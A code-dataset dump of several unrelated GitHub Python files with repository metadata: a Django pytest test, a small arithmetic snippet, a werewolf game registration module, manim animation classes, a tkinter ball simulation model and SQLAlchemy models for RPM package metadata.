mohan277/project_management_portal | 1,176,821,044,852 | 7bfb324966728ff8395e9282093b11b580279dcd | 0a9c7079723ef6776324fa5a37fe0ce2868fd54f | /project_management_portal_auth/tests/storages/test_validate_admin_storage_implementation.py | 0512217edd5aef26f1e7a385b9502ad240a53e04 | [] | no_license | https://github.com/mohan277/project_management_portal | 9e6b4ab4cce09bb61a742de212332f69663781eb | ce91c912731c7bba7674c1a00385862bad7a437b | refs/heads/master | "2023-06-20T15:06:56.251028" | "2021-07-22T17:03:00" | "2021-07-22T17:03:00" | 269,610,965 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pytest
from project_management_portal_auth.dtos.user_dto import IsAdminDTO
from project_management_portal_auth.models.user import User
from project_management_portal_auth.storages.storage_implementation import \
StorageImplementation
class TestStorageImplementation:
@pytest.mark.django_db
def test_given_user_id_is_admin_return_is_admin_valid_dto(
self, is_admin_valid_dto):
# Arrange
expected_dto = is_admin_valid_dto
user_id = 1
storage = StorageImplementation()
# Act
actual_dto = storage.is_admin(user_id=user_id)
#Assert
assert actual_dto == expected_dto
@pytest.fixture
def create_user(self):
user_obj = User.objects.create(
name='user1',
is_admin=False,
profile_pic_url='profile_pic_1'
)
return user_obj
@pytest.fixture
def is_admin_valid_dto(self, create_user):
is_admin_valid_dto = IsAdminDTO(is_admin=False)
return is_admin_valid_dto
| UTF-8 | Python | false | false | 1,040 | py | 138 | test_validate_admin_storage_implementation.py | 136 | 0.648077 | 0.645192 | 0 | 37 | 27.108108 | 76 |
Aasthaengg/IBMdataset | 6,949,257,121,209 | 83368e6900fafac3e96caf248d0c4467419dcd36 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02399/s930109842.py | d2033ff35be53912e7581771eb41afb34effb7a7 | [] | no_license | https://github.com/Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | "2023-04-22T10:22:44.763102" | "2021-05-13T17:27:22" | "2021-05-13T17:27:22" | 367,112,348 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf-8
a, b = map(int, raw_input().split())
print "{0:d} {1:d} {2:f}".format(a / b, a % b, 1.0 * a / b) | UTF-8 | Python | false | false | 112 | py | 202,060 | s930109842.py | 202,055 | 0.5 | 0.446429 | 0 | 4 | 27.25 | 59 |
Kaetherina/werwolf | 6,579,889,919,878 | 676b1980983d842c5d21c663eb087d4b7ea77d63 | ce6db73b1e301bf14946886b1c08623ab660211c | /registrationLogic.py | 1a205b814ef13b3f67022acdadcf3715a05f11bc | [] | no_license | https://github.com/Kaetherina/werwolf | 608861949de682af89261952a583d4a45bd2843f | d61a1b66574dd3a311f2b4ef89e0cb96d77a7d12 | refs/heads/master | "2020-06-13T01:01:07.746706" | "2016-12-07T16:01:17" | "2016-12-07T16:01:17" | 75,471,257 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
import time
import random
import logging
master = "not set"
allowedRoles = ["Amor", "Seherin", "Hexe", "Jaeger"]
players = []
roles = []
playersRoles = []
specialRoles = []
numPlayers = 0
pw = "werwolf"
def setMaster(name):
global players
global master
master = name
players.append(name)
print("the master is set to \""+name+"\"")
def setPassword(password):
global pw
pw = password
print("the password was set to \"" + password +"\"")
def getPassword():
return pw
def setNumOfPlayers(numOfPlayers):
global numPlayers
numPlayers = numOfPlayers
print("The number of players is "+ numPlayers)
def setSpecialRoles(wantedSpecialRoles):
global roles
if testSpecialRoles(wantedSpecialRoles):
global specialRoles
specialRoles= wantedSpecialRoles
roles = getAllRoles(numPlayers, wantedSpecialRoles)
print("These are all the possible roles: "+ str(roles))
return roles
else:
print("not all special roles were found.. do some spellcheck")
return False
def testSpecialRoles(specialRoles):
temp = -1
for i in range(0, len(specialRoles)):
if allowedRoles.index(specialRoles[i])<0:
return False
return True
def getAllRoles(num, specialRoles):
global roles
if num<8:
numWerwolf = 1
elif num<13:
numWerwolf = 2
elif num<16:
numWerwolf = 3
else:
numWerwolf = int(num/4)
numSpecials = len(specialRoles)
numBuerger = num - numWerwolf - numSpecials
for i in range(0, num):
if i<numWerwolf:
roles.append("Werwolf")
elif (i-numWerwolf)<numBuerger:
roles.append("Buerger")
else:
roles.append(specialRoles[i-numWerwolf-numBuerger])
return roles
def ready():
if master == "not set":
return "master"
elif numPlayers <5:
return "players"
elif len(specialRoles) == 0:
return "roles"
else:
return "ready"
def newPlayer(name, inputPassword):
if inputPassword==pw:
if name in players:
return "!name"
players.append(name)
print("we currently have these players: "+ str(players))
print("the length of the array is currently "+ str(len(players)) + "while the number of players is " + str(numPlayers))
if numPlayers==len(players):
giveRoles()
print("got all players now! Proceed to the game")
return "success"
return "player added"
else:
return "!password"
def giveRoles():
global playersRoles
global roles
random.shuffle(roles)
print(str(playersRoles))
for i in range(0, len(roles)):
playersRoles.append([players[i], roles[i]])
print("go all players and roles now, have a look: " + str(playersRoles))
def reset(name):
if name==master:
players = []
playersRoles = []
return True
else:
return False
#playerRoles=[[Kaethe, Werwolf], [Kevin, Schlampe], []]
| UTF-8 | Python | false | false | 2,821 | py | 5 | registrationLogic.py | 4 | 0.672102 | 0.665721 | 0 | 119 | 21.705882 | 121 |
headboost/manim | 12,687,333,425,901 | cea5a12f7ea6992c90ced7a9e27c464678533adc | fb2786fb05995df29e2b36dd00ffeffee6ad69ce | /derivative/objects.py | b2667e78a54fd049c039c614c25f0ab7081311f3 | [] | no_license | https://github.com/headboost/manim | 2a1cbeb7526ed9c40add309c5b78336398560469 | c07fc81ec9d36e94b4d80cb00f7f6c3505de2210 | refs/heads/main | "2023-03-29T11:26:57.518165" | "2021-04-01T00:21:03" | "2021-04-01T00:21:03" | 349,242,711 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from manim import *
import numpy as np
import math
class DerivativeSquaresArea(VGroup):
CONFIG={
"original_square_kwargs":{
"width":2.5,
"height":2.5,
"color":BLUE_E,
"fill_color":BLUE_E,
"fill_opacity":1,
},
"dx_square_right_kwargs":{
"width":0.2,
"height":2.5,
"color":YELLOW_E,
"fill_color":YELLOW_E,
"fill_opacity":1,
},
"dx_square_up_kwargs":{
"width":2.5,
"height":0.2,
"color":YELLOW_E,
"fill_color":YELLOW_E,
"fill_opacity":1,
},
"dxdx_square_kwargs":{
"width":0.2,
"height":0.2,
"color":YELLOW_E,
"fill_color":YELLOW_E,
"fill_opacity":1,
},
"brace_and_label_kwargs_for_original_square":{
"brace_color":WHITE,
"label_color":BLUE,
},
"brace_and_label_kwargs_for_dx_squares":{
"brace_color":WHITE,
"label_color":YELLOW,
},
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
super().__init__(**kwargs)
self.original_square=Rectangle(**self.original_square_kwargs)
self.dx_square_right=Rectangle(**self.dx_square_right_kwargs).next_to(self.original_square,RIGHT,buff=0)
self.dx_square_up=Rectangle(**self.dx_square_up_kwargs).next_to(self.original_square,UP,buff=0)
self.dxdx_square=Rectangle(**self.dxdx_square_kwargs).next_to(self.dx_square_right,UP,buff=0)
self.squares=VGroup(self.original_square, self.dx_square_right, self.dx_square_up, self.dxdx_square)
self.brace_up=Brace(self.dx_square_up,0.4*UP,)
self.label_up=MathTex("x").scale(1).set_color(self.brace_and_label_kwargs_for_original_square["label_color"]).next_to(self.brace_up, 0.6*UP)
self.brace_right=Brace(self.dx_square_right, 0.4*RIGHT,)
self.label_right=MathTex("x").scale(1).set_color(self.brace_and_label_kwargs_for_original_square["label_color"]).next_to(self.brace_right, 0.6*RIGHT)
self.braces_and_labels=VGroup(self.brace_up, self.label_up, self.brace_right, self.label_right)
self.dx_brace_up=Brace(self.dxdx_square,0.4*UP,)
self.dx_label_up=MathTex("dx").scale(0.9).set_color(self.brace_and_label_kwargs_for_dx_squares["label_color"]).next_to(self.dx_brace_up, 0.6*UP)
self.dx_brace_right=Brace(self.dxdx_square,0.4*RIGHT, )
self.dx_label_right=MathTex("dx").scale(0.9).set_color(self.brace_and_label_kwargs_for_dx_squares["label_color"]).next_to(self.dx_brace_right, 0.6*RIGHT)
self.dx_braces_and_labels=VGroup(self.dx_brace_up, self.dx_label_up, self.dx_brace_right, self.dx_label_right)
self.all_squares=VGroup(self.squares, self.braces_and_labels, self.dx_braces_and_labels).move_to([0,0,0])
self.add(
self.all_squares,
)
def get_original_square(self):
return self.original_square
def get_dx_square_right(self):
return self.dx_square_right
def get_dx_square_up(self):
return self.dx_square_up
def get_dxdx_square(self):
return self.dxdx_square
def get_brace_up(self):
return self.brace_up
def get_brace_right(self):
return self.brace_right
def get_dx_brace_up(self):
return self.dx_brace_up
def get_dx_brace_right(self):
return self.dx_brace_right
def get_label_up(self):
return self.label_up
def get_label_right(self):
return self.label_right
def get_dx_label_up(self):
return self.dx_label_up
def get_dx_label_right(self):
return self.dx_label_right
class DerivativeSquaresAreaSplitted(DerivativeSquaresArea):
CONFIG={
"kwargs":
{
"split_factor": 0.2
},
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
super().__init__(**kwargs)
self.dx_square_right.shift(self.kwargs["split_factor"]*RIGHT)
self.dx_square_up.shift(self.kwargs["split_factor"]*UP)
self.dxdx_square.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
self.brace_up.shift(self.kwargs["split_factor"]*UP)
self.brace_right.shift(self.kwargs["split_factor"]*RIGHT)
self.label_up.shift(self.kwargs["split_factor"]*UP)
self.label_right.shift(self.kwargs["split_factor"]*RIGHT)
self.dx_brace_up.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
self.dx_brace_right.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
self.dx_label_up.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
self.dx_label_right.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
class DerivativeCubeVolume(VGroup):
CONFIG={
"original_cube_kwargs":{
"color":BLUE_E,
"stroke_color":WHITE,
"opacity":0.75,
"stroke_width":0.5,
"side_length": 2.5,
},
"added_cubes_kwargs":{
"color":YELLOW_E,
"stroke_color":YELLOW,
"opacity":0.4,
"stroke_width":0.5,
"thickness": 0.2,
},
"brace_and_label_kwargs_for_original_cube":{
"brace_color":WHITE,
"label_color":BLUE,
},
"brace_and_label_kwargs_for_dx_cube":{
"brace_color":WHITE,
"label_color":YELLOW,
},
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
super().__init__(**kwargs)
c_opacity_cubes=0.4
# transform_matrix
y=10*PI/180
x=10*PI/180
y_mat=[[math.cos(y),0,math.sin(y)],[0,1,0],[-math.sin(y),0,math.cos(y)]] #y軸周りに回転
x_mat=[[1,0,0],[0,math.cos(x),-math.sin(x)],[0,math.sin(x),math.cos(x)]] #x軸周りに回転
# fix coordinates
fix_c=self.original_cube_kwargs["side_length"]/2+self.added_cubes_kwargs["thickness"]/2
self.cube=Cube(
fill_opacity=self.original_cube_kwargs["opacity"],
fill_color=self.original_cube_kwargs["color"],
color=self.original_cube_kwargs["stroke_color"],
stroke_width=self.original_cube_kwargs["stroke_width"],
side_length=self.original_cube_kwargs["side_length"]
).move_to([0,0,0])
self.cube_f=Prism(
dimensions=[self.original_cube_kwargs["side_length"],self.original_cube_kwargs["side_length"],self.added_cubes_kwargs["thickness"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[0,0,fix_c]
)
self.cube_t=Prism(
dimensions=[self.original_cube_kwargs["side_length"],self.added_cubes_kwargs["thickness"],self.original_cube_kwargs["side_length"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
). move_to(
[0, fix_c, 0]
)
self.cube_r=Prism(
dimensions=[self.added_cubes_kwargs["thickness"],self.original_cube_kwargs["side_length"],self.original_cube_kwargs["side_length"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[fix_c,0,0]
)
self.bar_f=Prism(
dimensions=[self.original_cube_kwargs["side_length"],self.added_cubes_kwargs["thickness"],self.added_cubes_kwargs["thickness"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[0,
fix_c,
fix_c]
)
self.bar_r=Prism(
dimensions=[self.added_cubes_kwargs["thickness"],self.original_cube_kwargs["side_length"],self.added_cubes_kwargs["thickness"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[fix_c,
0,
fix_c]
)
self.bar_t=Prism(
dimensions=[self.added_cubes_kwargs["thickness"],self.added_cubes_kwargs["thickness"],self.original_cube_kwargs["side_length"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[
fix_c,
fix_c,
0,]
)
self.cube_dx=Prism(
dimensions=[self.added_cubes_kwargs["thickness"],self.added_cubes_kwargs["thickness"],self.added_cubes_kwargs["thickness"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[
fix_c,
fix_c,
fix_c,]
)
self.cubes=VGroup(
self.cube,
self.cube_f,
self.cube_t,
self.cube_r,
self.bar_f,
self.bar_t,
self.bar_r,
self.cube_dx
)
self.br_cube=Brace(
self.cube,LEFT
).move_to(
[-(fix_c+0.2), 0, -(fix_c+0.2)]
)
self.lab_cube=MathTex("x").scale(1).set_color(
self.brace_and_label_kwargs_for_original_cube["label_color"]
).next_to(self.br_cube,1*LEFT)
self.br_cube_t=Brace(
self.bar_f,LEFT
).move_to(
[-(fix_c+0.2), (fix_c), -(fix_c+0.2)]
)
self.lab_cube_t=MathTex("dx").scale(0.9).set_color(self.brace_and_label_kwargs_for_dx_cube["label_color"]).next_to(self.br_cube_t,1*LEFT)
self.braces_and_labels=VGroup(self.br_cube, self.lab_cube, self.br_cube_t, self.lab_cube_t)
self.cubes_and_braces=VGroup(self.cubes, self.braces_and_labels).apply_matrix(y_mat).apply_matrix(x_mat)
self.add(self.cubes_and_braces)
def get_original_cube(self):
return self.cube
def get_original_brace_and_label(self):
return VGroup(self.br_cube, self.lab_cube)
def get_d_brace_and_label(self):
return VGroup(self.br_cube_t, self.lab_cube_t)
def get_dx_cubes(self):
return VGroup(self.cube_f, self.cube_t, self.cube_r)
def get_dxdx_cubes(self):
return VGroup(self.bar_f, self.bar_t, self.bar_r)
def get_dx3_cube(self):
return self.cube_dx
class DerivativeCubeVolumeSplitted(DerivativeCubeVolume): | UTF-8 | Python | false | false | 11,665 | py | 6 | objects.py | 4 | 0.571944 | 0.562151 | 0 | 304 | 37.296053 | 161 |
cncota/python-projects-6-to-10 | 506,806,149,457 | e8f4012b14288d3757fc62ca64431065d4ea878d | aa91395c989e3c387143f815ef9c9aaa9bce46af | /program5/model.py | 2afed283cbb6e8c9da3bf3cf09b10144efdad369 | [] | no_license | https://github.com/cncota/python-projects-6-to-10 | be0e016192fbaf283de48778c00e414d19966a93 | c50b98d33d6e859697630876c06535192d838d18 | refs/heads/master | "2020-05-29T19:26:07.963255" | "2019-05-30T02:38:22" | "2019-05-30T02:38:22" | 189,330,155 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import controller, sys
import model #strange, but we need a reference to this module to pass this module to update
from ball import Ball
from floater import Floater
from blackhole import Black_Hole
from pulsator import Pulsator
from hunter import Hunter
import math,random
running = False  # True while the simulation auto-advances each tick
cycle_count = 0  # number of update cycles executed so far
balls = set()    # movable simultons (Ball / Floater instances)
object = None    # currently selected tool name; NOTE(review): shadows the builtin 'object'
simu = set()     # stationary simultons (Black_Hole / Pulsator / Hunter)
def world():
    """Return the current (width, height) of the simulation canvas."""
    canvas = controller.the_canvas
    return (canvas.winfo_width(), canvas.winfo_height())
def random_angle():
    """Return a uniformly random heading in radians, in [0, 2*pi)."""
    turn = random.random()
    return turn * math.pi * 2
def reset():
    """Restore the simulation to its initial, empty, paused state."""
    global running, cycle_count, balls
    balls = set()
    cycle_count = 0
    running = False
def start():
    """Resume automatic advancement of the simulation."""
    global running
    running = True
def stop():
    """Pause automatic advancement of the simulation."""
    global running
    running = False
def step():
    """Advance the simulation by exactly one cycle and leave it paused.

    Simplification of the original twin-branch version: both branches of
    ``if running`` incremented the cycle counter once and updated every
    ball once (inside a dummy ``for i in [1]: ... break`` loop); the only
    extra effect of the True branch was setting ``running`` to False.
    Always doing the increment/update and always ending with ``running``
    False is observably identical.
    """
    global cycle_count
    global running
    cycle_count += 1
    for b in balls:
        b.update()
    running = False
# Tool selection: remembers what the next canvas click should do.
def select_object(kind):
    """Remember the kind of simulton the next (x, y) canvas click creates
    (or 'Remove' to delete objects at the click point).

    NOTE(review): this rebinds the module-level name ``object``, which
    shadows the builtin of the same name.
    """
    global object
    object = str(kind)
def mouse_click(x, y):
    """Handle a canvas click at (x, y) according to the selected tool.

    Depending on the module-level ``object`` selection this either spawns
    a new simulton at the click position or, for 'Remove', deletes every
    simulton whose shape contains the point.
    """
    global object
    if object == 'Ball':
        balls.add(Ball(x, y, random_angle()))
    elif object == "Floater":
        balls.add(Floater(x, y, random_angle()))
    elif object == "Black_Hole":
        simu.add(Black_Hole(x, y))
    elif object == "Pulsator":
        simu.add(Pulsator(x, y))
    elif object == "Hunter":
        simu.add(Hunter(x, y, random_angle()))
    elif object == "Remove":
        # Collect first, then delete, so the sets are never mutated while
        # they are being iterated.
        hit_balls = {b for b in balls if b.contains((x, y))}
        hit_simus = {s for s in simu if s.contains((x, y))}
        for b in hit_balls:
            remove(b)
        for s in hit_simus:
            simu.remove(s)
def add(s):
    """Add simulton *s* to the set of movable simultons."""
    balls.add(s)
def remove(s):
    """Remove simulton *s* from the set of movable simultons."""
    balls.remove(s)
def find(p):
    """Remove every ball whose centre lies inside simulton ``p``.

    Despite the historical header comment ("find/return a set"), this does
    not return the matching balls: it deletes them from the simulation and
    redraws the canvas.
    """
    swallowed = {b for b in balls if p.contains((b._x, b._y))}
    for b in swallowed:
        remove(b)
    display_all()
def update_all():
    """Advance every simulton by one tick, counting the cycle if running."""
    global cycle_count
    if running:
        cycle_count += 1
    for ball in balls:
        ball.update()
    for simulton in simu:
        # Let the stationary simulton swallow any ball it covers, then
        # advance its own state.
        find(simulton)
        simulton.update()
# Repaint the canvas from scratch each frame and refresh the progress label.
def display_all():
    """Clear the canvas, redraw every simulton, and update the counter.

    Deleting everything and redrawing is simpler than moving individual
    canvas items, at a small performance cost.
    """
    canvas = controller.the_canvas
    for item in canvas.find_all():
        canvas.delete(item)
    for ball in balls:
        ball.display(canvas)
    for simulton in simu:
        simulton.display(canvas)
    label = str(len(balls)) + " balls/" + str(cycle_count) + " cycles"
    controller.the_progress.config(text=label)
| UTF-8 | Python | false | false | 3,617 | py | 16 | model.py | 16 | 0.556262 | 0.553497 | 0 | 148 | 22.439189 | 93 |
chong601/rpm-package-explorer | 2,499,670,986,423 | c977b469ba88651afa3da4f90bbdc03bba1c32a9 | b1e30c4fde506d67dbe8a6ea02d5bee200118474 | /rpm_package_explorer/db_model/sqlalchemy_models.py | 108bade55e3a27dc1f8083568f8fc35bc18a9297 | [
"MIT"
] | permissive | https://github.com/chong601/rpm-package-explorer | a60486b26e7d2ccb7dda2187907ae8b7959e757c | 5a14f15f90612528b323d0bb4cdeb2005925b02b | refs/heads/main | "2023-06-24T16:39:26.125234" | "2021-07-26T13:12:48" | "2021-07-26T13:12:48" | 384,791,697 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import uuid
from dataclasses import dataclass
from sqlalchemy import Text, Integer, Boolean, Column, TIMESTAMP
@dataclass
class DBInfo(object):
    """Row model for the ``db_info`` table (per-repo database metadata)."""

    __tablename__ = 'db_info'

    dbinfo_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
    repo_category: str = Column(Text, comment='Repository category that this row represents')
    dbversion: int = Column(Integer, comment='DB version')
    checksum: str = Column(Text, comment='Hash for the XML file')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Packages(object):
    """Row model for the ``packages`` table: one RPM package per row."""

    __tablename__ = 'packages'

    pkg_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgKey: int = Column(Integer, comment='Primary key for the packages')
    # pkgId doubles as the package hash.
    pkgId: str = Column(Text, nullable=False, comment='The package ID of the package')
    name: str = Column(Text, nullable=False, comment='Package name')
    arch: str = Column(Text, nullable=False, comment='Architecture the package is for')
    version: str = Column(Text, nullable=False, comment='Package version')
    epoch: int = Column(Integer, nullable=False, comment='Package epoch')
    release: str = Column(Text, nullable=False, comment='Package release')
    summary: str = Column(Text, nullable=False, comment='Package summary')
    description: str = Column(Text, nullable=False, comment='Package description')
    url: str = Column(Text, comment='Package upstream URL')
    time_file: int = Column(TIMESTAMP, comment='File timestamp')
    time_build: int = Column(TIMESTAMP, comment='File build time')
    rpm_license: str = Column(Text, comment='Package license')
    rpm_vendor: str = Column(Text)
    rpm_group: str = Column(Text)
    rpm_buildhost: str = Column(Text)
    rpm_sourcerpm: str = Column(Text, comment='Source RPM file location')
    rpm_header_start: int = Column(Integer)
    rpm_header_end: int = Column(Integer)
    rpm_packager: str = Column(Text)
    size_package: int = Column(Integer)
    size_installed: int = Column(Integer)
    size_archive: int = Column(Integer)
    location_href: str = Column(Text)
    location_base: str = Column(Text)
    checksum_type: str = Column(Text)

    def __init__(self, **kwargs):
        """Populate the package row straight from keyword arguments.

        :param **kwargs: package data to be inserted into the database,
            one keyword per column.
        """
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Conflicts(object):
    """Row model for the ``conflicts`` table (packages this one conflicts with)."""

    __tablename__ = 'conflicts'

    conflict_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    name: str = Column(Text, comment='Package name')
    flags: str = Column(Text, comment='Package conflict comparison flag')
    epoch: int = Column(Integer, comment='Package epoch that the package conflicts with')
    # NOTE(review): version/release are deliberately left unannotated, matching
    # the original; annotating them would turn them into dataclass fields and
    # change the generated __repr__/__eq__.
    version = Column(Text, comment='Package version that the package conflicts with')
    release = Column(Text, comment='Package release that the package conflicts with')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Enhances(object):
    """Row model for the ``enhances`` table (weak forward dependencies)."""

    __tablename__ = 'enhances'

    enhance_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    name: str = Column(Text, comment='Package name')
    flags: str = Column(Text, comment='Package conflict comparison flag')
    epoch: int = Column(Integer, comment='Package epoch that the package enhances')
    version: str = Column(Text, comment='Package version that the package enhances')
    release: str = Column(Text, comment='Package release that the package enhances')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Files(object):
    """Row model for the ``files`` table.

    Note: this table follows the saner approach of listing each file in its
    own row, rather than the original SQLite packages-database format that
    packs file names with ``/`` separators and file types as a
    per-character string.
    """

    __tablename__ = 'files'

    file_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    name: str = Column(Text, comment='File name')
    # NOTE(review): the attribute name 'type' shadows the builtin; kept for
    # schema compatibility.
    type: str = Column(Text, comment='File type')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Obsoletes(object):
    """Row model for the ``obsoletes`` table.

    NOTE(review): the primary-key attribute ``enhance_uuid`` and the
    '...enhances' column comments look copy-pasted from ``Enhances``;
    kept verbatim because renaming would change the schema.
    """

    __tablename__ = 'obsoletes'

    enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    name: str = Column(Text, comment='Package name')
    flags: str = Column(Text, comment='Package conflict comparison flag')
    epoch: int = Column(Integer, comment='Package epoch that the package enhances')
    version: str = Column(Text, comment='Package version that the package enhances')
    release: str = Column(Text, comment='Package release that the package enhances')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Provides(object):
    """Row model for the ``provides`` table.

    NOTE(review): attribute name ``enhance_uuid`` and the '...enhances'
    column comments look copy-pasted from ``Enhances``; kept verbatim.
    """

    __tablename__ = 'provides'

    enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    name: str = Column(Text, comment='Package name')
    flags: str = Column(Text, comment='Package conflict comparison flag')
    epoch: int = Column(Integer, comment='Package epoch that the package enhances')
    version: str = Column(Text, comment='Package version that the package enhances')
    release: str = Column(Text, comment='Package release that the package enhances')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Recommends(object):
    """Row model for the recommends table.

    NOTE(review): ``__tablename__`` is capitalised ('Recommends'), unlike
    every other table here; kept verbatim to avoid a schema change, but
    worth confirming against the real database.
    """

    __tablename__ = 'Recommends'

    enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    name: str = Column(Text, comment='Package name')
    flags: str = Column(Text, comment='Package conflict comparison flag')
    epoch: int = Column(Integer, comment='Package epoch that the package enhances')
    version: str = Column(Text, comment='Package version that the package enhances')
    release: str = Column(Text, comment='Package release that the package enhances')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Requires(object):
    """Row model for the ``requires`` table (hard dependencies)."""

    __tablename__ = 'requires'

    enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    name: str = Column(Text, comment='Package name')
    flags: str = Column(Text, comment='Package conflict comparison flag')
    epoch: int = Column(Integer, comment='Package epoch that the package enhances')
    version: str = Column(Text, comment='Package version that the package enhances')
    release: str = Column(Text, comment='Package release that the package enhances')
    pre: bool = Column(Boolean, comment='Signals if the requirement is a prerequisite for preinstallation')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Suggests(object):
    """Row model for the suggests table.

    NOTE(review): ``__tablename__`` is capitalised ('Suggests'), unlike the
    lower-case convention used elsewhere in this module; kept verbatim.
    """

    __tablename__ = 'Suggests'

    enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    name: str = Column(Text, comment='Package name')
    flags: str = Column(Text, comment='Package conflict comparison flag')
    epoch: int = Column(Integer, comment='Package epoch that the package enhances')
    version: str = Column(Text, comment='Package version that the package enhances')
    release: str = Column(Text, comment='Package release that the package enhances')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class Supplements(object):
    """Row model for the ``supplements`` table."""

    __tablename__ = 'supplements'

    enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    name: str = Column(Text, comment='Package name')
    flags: str = Column(Text, comment='Package conflict comparison flag')
    epoch: int = Column(Integer, comment='Package epoch that the package enhances')
    version: str = Column(Text, comment='Package version that the package enhances')
    release: str = Column(Text, comment='Package release that the package enhances')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class FileList(object):
    """Row model for the ``filelist`` table: one file of one package per row."""

    __tablename__ = 'filelist'

    filelist_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    filename: str = Column(Text, comment='File name')
    filetype: str = Column(Text, comment='File type')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
@dataclass
class ChangeLog(object):
    """Row model for the ``changelog`` table: one changelog entry per row."""

    __tablename__ = 'changelog'

    changelog_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
    pkgId: str = Column(Text, nullable=False)
    author: str = Column(Text, comment='Author name')
    date: int = Column(TIMESTAMP, comment='Changelog date')
    changelog: str = Column(Text, comment='Changes')

    def __init__(self, **kwargs):
        """Populate the row straight from keyword arguments, unchecked."""
        for column_name, column_value in kwargs.items():
            setattr(self, column_name, column_value)
